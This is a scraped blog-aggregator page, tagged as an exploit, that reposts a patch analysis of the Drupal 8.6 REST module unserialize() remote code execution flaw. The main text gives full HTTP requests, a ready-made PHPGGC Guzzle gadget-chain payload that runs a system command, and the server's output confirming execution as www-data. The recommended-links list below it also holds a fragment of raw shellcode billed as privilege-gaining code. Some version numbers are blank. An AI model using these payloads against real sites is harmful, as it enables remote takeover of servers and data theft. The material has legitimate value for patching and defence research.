Analyzing the patch

By diffing Drupal 8.6. and 8.6., we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, thing that can easily be exploited using tools such as PHPGGC. Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);.

As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.

Triggering the unserialize()

Having all these elements in mind, triggering an unserialize is fairly easy:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "<SERIALIZED_CONTENT>"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

Since Drupal  uses Guzzle, we can generate a payload using PHPGGC:

$ ./phpggc guzzle/rce1 system id --json

"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

We can now send the payload via GET:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

To which Drupal responds:

HTTP/1.1  OK

Link: <...>

X-Generator: Drupal  (https://www.drupal.org)

X-Drupal-Cache: MISS

Connection: close

Content-Type: application/hal+json

Content-Length: 

{...}uid=(www-data) gid=(www-data) groups=(www-data)

Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.

[EXP]Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution的更多相关文章

  1. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  2. [EXP]Microsoft Windows CONTACT - Remote Code Execution

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...

  3. [EXP]WordPress Core 5.0 - Remote Code Execution

    var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ...

  4. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  5. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  6. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  7. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  8. GTAC 2015将于11月10号和11号召开

    今年的GTAC注册已经结束,将会在11月10号和11号在Google马萨诸塞州剑桥办公室召开.大家可以关注https://developers.google.com/google-test-autom ...

  9. 【译】C++工程师需要掌握的10个C++11特性

    原文标题:Ten C++11 Features Every C++ Developer Should Use 原文作者:Marius Bancila 原文地址:codeproject 备注:非直译,带 ...

随机推荐

  1. oday获取系统最高权限的代码

    import sys,sockettarget = sys.argv[1]shellcode = ("\x6a\x4f\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81 ...

  2. Python的基本用法

    ---恢复内容开始--- 一.函数 1.1 默认参数 想要计算一个数x的n次方,可以定义如下的函数.但是有时候我们仅仅只需要计算x^2,所以只想使用一个参数即power(x),这时如果仍用如下代码会报 ...

  3. AltiumDesigner PCB中栅格与格点的切换

    PCB中通过快捷键Ctrl+G,进入设置界面. 在弹出的对话框中,在Display,Coarse选择Lines为栅格,Dots为格点,Do Not Draw为无任何显示.

  4. FortiGate部分用户上网慢,丢包严重

    1.现状: 如图,出口internet有2条联通线路分别为liant_218和liant_61,在防火墙上使用WAN LLB,基于源IP: 2.现象: 使用liant_218的用户上网正常,使用lia ...

  5. 在java项目中使用umeditor

    之前有介绍了ueditor的用法,可看这篇:https://www.cnblogs.com/roy-blog/p/7250668.html umeditor是ueditor的简化版,不仅在功能,容量上 ...

  6. Sublime Text3快捷键大全

    选择类 Ctrl+D 选中光标所占的文本,继续操作则会选中下一个相同的文本. Alt+F3 选中文本按下快捷键,即可一次性选择全部的相同文本进行同时编辑.举个栗子:快速选中并更改所有相同的变量名.函数 ...

  7. FastFDS安装及简单使用

    1. FastDFS安装(ubuntu) 需要准备: nginx.fastdfs.libfastcommon.gcc.git apt-get update apt-get -y install mak ...

  8. windows下webstorm调试react native

    安装请参考:http://www.cnblogs.com/wjx0912/p/5662457.html webstorm在2016.10.20的版本才正式增加react native的调试支持,所以w ...

  9. js 原型链与继承

    var A = function(){ this.name="xiaoming"; } A.prototype.age=9; var a = new A(); console.lo ...

  10. 阿里云ECS装LAMP环境

    学生计划9.9买个一个ECS,要做PHP开发,所以搭建一个Lamp的环境 1.使用镜像,附件 sh-1.5.5附于文后. 2.一键安装 2.1 输入命令:chmod –R 777 sh-1.5.5 c ...